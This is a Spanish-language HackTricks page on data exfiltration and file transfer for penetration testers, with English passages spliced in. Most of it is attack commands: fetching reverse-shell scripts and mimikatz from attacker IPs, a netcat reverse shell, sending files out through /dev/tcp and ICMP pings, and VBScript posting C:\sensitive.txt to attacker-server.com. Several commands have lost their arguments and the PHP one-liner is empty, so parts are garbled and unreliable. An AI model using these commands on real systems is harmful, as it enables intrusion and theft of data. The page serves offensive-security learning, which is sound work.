# Exfiltración
Aprende hacking en AWS desde cero hasta experto con htARTE (Experto en Red Team de AWS de HackTricks)! Otras formas de apoyar a HackTricks: * Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! * Obtén el [**swag oficial de PEASS & HackTricks**](https://peass.creator-spring.com) * Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
**Grupo de Seguridad Try Hard**
{% embed url="https://discord.gg/tryhardsecurity" %} *** ## Dominios comúnmente permitidos para exfiltrar información Consulta [https://lots-project.com/](https://lots-project.com/) para encontrar dominios comúnmente permitidos que pueden ser abusados ## Copiar y Pegar Base64 **Linux** ```bash base64 -w0 #Encode file base64 -d file #Decode file ``` **Windows** ``` certutil -encode payload.dll payload.b64 certutil -decode payload.b64 payload.dll ``` ## HTTP **Linux** ```bash wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py fetch 10.10.14.14:8000/shell.py #FreeBSD ``` **Windows** ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf #PS (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $output #OR Start-BitsTransfer -Source $url -Destination $output -Asynchronous ``` ### Subir archivos * [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) * [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) * Módulo de Python [uploadserver](https://pypi.org/project/uploadserver/): ```bash # Listen to files python3 -m pip install --user uploadserver python3 -m uploadserver # With basic auth: # python3 -m uploadserver --basic-auth hello:world # Send a file curl -X POST http://HOST/upload -H -F 'files=@file.txt' # With basic auth: # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world ``` ### **Servidor HTTPS** ```python # from https://gist.github.com/dergachev/7028596 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ # generate server.xml with the following command: # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes # run as follows: # python simple-https-server.py # then in your browser, visit: # https://localhost:443 ### PYTHON 2 import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever() ### ### PYTHON3 from http.server import HTTPServer, BaseHTTPRequestHandler import ssl httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler) httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True) httpd.serve_forever() ### ### USING FLASK from flask import Flask, redirect, request from urllib.parse import quote app = Flask(__name__) @app.route('/') def root(): print(request.get_json()) return "OK" if __name__ == "__main__": app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) ### ``` ## FTP ### Servidor FTP (python) ```bash pip3 install pyftpdlib python3 -m pyftpdlib -p 21 ``` ### Servidor FTP (NodeJS) ``` sudo npm install -g ftp-srv --save ftp-srv ftp://0.0.0.0:9876 --root /tmp ``` ### Servidor FTP (pure-ftp) ```bash apt-get update && apt-get install pure-ftp ``` ```bash #Run the following script to configure the FTP server #!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pwd useradd fusr -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart ``` ### Cliente **Windows** ```bash #Work well with python. With pure-ftp use fusr:ftp echo open 10.11.0.41 21 > ftp.txt echo USER anonymous >> ftp.txt echo anonymous >> ftp.txt echo bin >> ftp.txt echo GET mimikatz.exe >> ftp.txt echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` ## SMB Kali como servidor ```bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op2> smbserver.py -smb2support name /path/folder # Share a folder #For new Win10 versions impacket-smbserver -smb2support -user test -password test test `pwd` ``` O crear un recurso compartido smb **utilizando samba**: ```bash apt-get install samba mkdir /tmp/smb chmod 777 /tmp/smb #Add to the end of /etc/samba/smb.conf this: [public] comment = Samba on Ubuntu path = /tmp/smb read only = no browsable = yes guest ok = Yes #Start samba service smbd restart ``` Windows --- ### Exfiltration Exfiltration is the unauthorized transfer of data from a target system. Attackers use various techniques to exfiltrate data, such as: - **Compression**: Attackers compress data before exfiltrating it to reduce its size and avoid detection. - **Encryption**: Data is encrypted to prevent unauthorized access during exfiltration. - **Steganography**: Attackers hide data within other files to avoid detection. - **Exfiltration over Alternative Protocols**: Attackers use protocols like DNS or ICMP to exfiltrate data, bypassing traditional security controls. - **Exfiltration over Command and Control Channels**: Attackers use existing command and control channels to exfiltrate data, making it harder to detect. To prevent exfiltration, organizations can implement measures such as: - **Network Segmentation**: Segregating networks to limit the movement of attackers within the network. - **Data Loss Prevention (DLP) Solutions**: Monitoring and preventing unauthorized data transfers. - **Network Traffic Analysis**: Monitoring network traffic for signs of exfiltration attempts. - **User Training**: Educating users about the risks of data exfiltration and how to recognize and report suspicious activities. By understanding exfiltration techniques and implementing appropriate security measures, organizations can better protect their data from unauthorized access and leakage. ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali" WindPS-2> cd new_disk: ``` ## SCP El atacante debe tener SSHd en ejecución. ```bash scp @:/ ``` ## SSHFS Si la víctima tiene SSH, el atacante puede montar un directorio de la víctima al atacante. ```bash sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` ## NC ### Description The `nc` command, also known as Netcat, is a versatile networking tool that can be used for various purposes during a penetration test. It can be used for port scanning, banner grabbing, transferring files, and establishing reverse shells. Netcat operates by establishing a connection between a client and a server, allowing for data transfer between the two. ### Usage To establish a connection with a remote server using `nc`, you can use the following command: ```bash nc ``` To listen for incoming connections on a specific port, you can use the following command: ```bash nc -l -p ``` ### Example Establishing a reverse shell using `nc`: 1. Attacker machine: `nc -l -p 1234 -e /bin/bash` 2. Victim machine: `nc 1234` This will establish a reverse shell from the victim machine to the attacker machine, allowing the attacker to execute commands on the victim's system. ```bash nc -lvnp 4444 > new_file nc -vn 4444 < exfil_file ``` ## /dev/tcp ### Descargar archivo desde la víctima ```bash nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim ``` ### Subir archivo a la víctima ```bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker # Inside victim exec 6< /dev/tcp/10.10.10.10/4444 cat <&6 > file.txt ``` Gracias a **@BinaryShadow\_** ## **ICMP** ```bash # To exfiltrate the content of a file via pings you can do: xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done #This will 4bytes per ping packet (you could probably increase this until 16) ``` ```python from scapy.all import * #This is ippsec receiver created in the HTB machine Mischief def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 0: data = pkt[ICMP].load[-4:] #Read the 4bytes interesting print(f"{data.decode('utf-8')}", flush=True, end="") sniff(iface="tun0", prn=process_packet) ``` ## **SMTP** Si puedes enviar datos a un servidor SMTP, puedes crear un servidor SMTP para recibir los datos con python: ```bash sudo python -m smtpd -n -c DebuggingServer :25 ``` ## TFTP Por defecto en XP y 2003 (en otros sistemas operativos necesita ser agregado explícitamente durante la instalación) En Kali, **iniciar el servidor TFTP**: ```bash #I didn't get this options working and I prefer the python option mkdir /tftp atftpd --daemon --port 69 /tftp cp /path/tp/nc.exe /tftp ``` **Servidor TFTP en python:** ```bash pip install ptftpd ptftpd -p 69 tap0 . # ptftp -p ``` En **víctima**, conectarse al servidor Kali: ```bash tftp -i get nc.exe ``` ## PHP Descarga un archivo con un PHP oneliner: ```bash echo "" > down2.php ``` ## VBScript ### Overview Visual Basic Scripting Edition (VBScript) is a scripting language developed by Microsoft. It is commonly used for writing scripts to automate tasks on Windows operating systems. VBScript can be used for exfiltration by reading data from files, registry keys, or other sources and sending it to an external server. ### Exfiltration Techniques #### 1. File Transfer VBScript can be used to read the contents of a file and send it to an external server using HTTP or other protocols. ```vbscript Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP") objXMLHTTP.open "POST", "http://attacker-server.com/receive.php", False objXMLHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" objXMLHTTP.send "data=" & ReadFile("C:\sensitive.txt") ``` #### 2. Registry Data VBScript can also be used to read data from the Windows registry and exfiltrate it to a remote server. ```vbscript Set objReg = GetObject("winmgmts:\\.\root\default:StdRegProv") objReg.GetStringValue &H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "MaliciousKey", strValue SendDataToServer strValue ``` ### Detection and Prevention To detect and prevent exfiltration using VBScript, monitoring network traffic for suspicious outbound connections, restricting VBScript execution in enterprise environments, and implementing endpoint security solutions can be effective measures. ```bash Attacker> python -m SimpleHTTPServer 80 ``` **Víctima** ```bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs ``` ```bash cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` ## Debug.exe El programa `debug.exe` no solo permite la inspección de binarios, sino que también tiene la **capacidad de reconstruirlos a partir de hexadecimal**. Esto significa que al proporcionar un hexadecimal de un binario, `debug.exe` puede generar el archivo binario. Sin embargo, es importante tener en cuenta que debug.exe tiene una **limitación de ensamblar archivos de hasta 64 kb de tamaño**. ```bash # Reduce the size upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt ``` Luego copia y pega el texto en la ventana de comandos de Windows y se creará un archivo llamado nc.exe. * [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html) ## DNS * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) **Try Hard Security Group**
{% embed url="https://discord.gg/tryhardsecurity" %}
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)! Otras formas de apoyar a HackTricks: * Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! * Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com) * Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).